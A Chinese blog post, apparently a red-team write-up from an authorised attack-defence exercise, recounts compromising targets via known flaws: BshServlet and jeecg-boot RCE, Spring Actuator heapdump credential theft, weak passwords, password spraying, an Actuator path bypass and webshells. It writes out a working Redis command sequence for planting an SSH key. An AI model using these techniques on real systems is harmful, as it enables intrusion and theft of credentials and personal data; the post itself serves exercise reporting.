【攻防实战】某行业hw-如何利用nday拿下n个靶标

发布于 作者:

【攻防实战】某行业hw-如何利用nday拿下n个靶标

原创 胡图图 攻防实战指南 2024-05-29 16:27

点击上方蓝字关注我们

原创声明

本文由[
攻防实战指南]原创,版权所有。未经本公众号书面授权,禁止任何形式的转载、摘编、复制或建立镜像。如需转载,请联系我们,违反上述声明者,我们将依法追究其法律责任

【序言】

上个月参加了某行业
HW,由于时间紧任务重,直接拿着
13页靶标就开始怼,在项目实施中,利用
nday拿下多个靶标,不出意外是第一,因为时间上的小插曲最后拿了第二,接下来简单分享下:

一、
某靶标NC bsh.servlet.BshServlet RCE

信息收集发现某靶标存在
bsh.servlet.BshServle RCE

经典
windows

直接注入内存马:

本地信息收集发现
mysql数据库:

由于表数据过于敏感因此不再展示且存在大量数据,发现目标管理员企业邮箱口令:

登录发现大量报单数据:

同时找到大量用户密码,直接构造账户密码本:

使用密码本在内网进行喷洒,发现本机管理员密码是其中之一且爆破出来
ssh密码:

在三台
linux主机上进行主机信息收集,主要寻找
history文件,其中一台部署了
web服务,疑似官网靶标,直接在官网目录下写文件:

拿下官网,该公司为重点靶标
+拿下官网,直接上大分;

二、
Actuator未授权-常规渗透手法[垃圾手法]

遇到这种路径我都会扫一下
spring的一些路径,果不其然发现了
actuator未授权,重点只关注能拿
shell的几个接口、
heapdump、一些日志接口:

直接看
heapdump,整理后发现
mysql数据库
,里面包含大量运行数据
:

ftp口令、网站管理员口令、
druid口令、
ossaksk:


靶标弱口令[垃圾手法]

某学校教务系统管理员存在弱口令,admin/123456;

一个班班累计48条学生姓名。电话,亲属电话,家庭地址,粗略估计100个班级左右,泄露5000条+

四、
弱口令+RCE

某高校教材管理系统存在弱口令,直接固定密码用户名枚举,喷洒出来两个口令,但是后台没有上传点,可以看到这是个老系统:

扫描同
IP下其他资产发现
druid弱口令:


durid后台所有接口抓出来发现存在一个登录口:

很像若依哈,跑一下是否存在:

这个站不让打内网;

五、
jeecg-boot rce漏洞

某靶标存在
jeecg-boot漏洞:

前台登录口在
bp中发现
jeecg的字样,网上测试了几个洞发现都存在,找个能直接拿
shell的
queryFieldBySql-rce
漏洞

直接打内存马:

这个内网只有一台机器,就没有必要再看了;

六、
actuator绕过+逻辑漏洞

依旧是靶标,存在
actuator未授权但是使用了绕过
/..;/..;/env:

路径下存在
T
race
接口泄漏部分员工
session:

拿着这个
session拼接到前端登录可进入后台,发现可操作大量设备:

七、
某指挥系统存在任意命令执行

依旧是靶标,前段时间爆出来的
0day没来得及修:

直接上一句话木马:

信息收集还没完就关站了

八、
actuator未授权+redisgetshell

依旧是靶标下某个目录发现actuator文件,直接下载heapdump

发现存在redis、mysql口令:

连接
mysql数据库发现各类账号密码
,对拿权限没用就没看
:

尝试
redis写公钥:

1.启动
vps: 

ssh-keygen -t rsa
cd /root/.ssh/

将公钥写入
txt: 

(echo -e "\n\n"; cat id_rsa.pub;echo -e "\n\n") > key.txt


cat key.txt | redis-cli -h 666 --pass 666 -x set xx

检验是否成功: 

config set dir /root/.ssh
config set dbfilename authorized_keys
save


ssh -i id_rsa root@6660

连接:

这个站拿下了宿主机里面跑了很多容器服务可直接拿权限,客户依旧不让打内网。

【后言】

总的来看这个行业
hw还是挺简单,由于时间紧没有深入细究,直接照着靶标扫了一遍,深度利用肯定有很多东西,可以看到文章中都是常规手法,主要还是不断提升自己的经验,拓展攻击面。

版权声明

本公众号所发布的文章仅代表作者个人观点,不代表本公众号立场。文章中的内容、图片、视频等资料,未经许可,不得用于商业用途。

转载或引用本公众号内容时,需注明来源,并保留本公众号的版权信息。

对于侵犯本公众号版权的行为,我们将保留采取法律手段追究的权利。

免责声明

本公众号提供的信息仅供参考,不构成任何形式的投资建议或专业意见。我们不对因使用本公众号内容而产生的任何损失承担责任。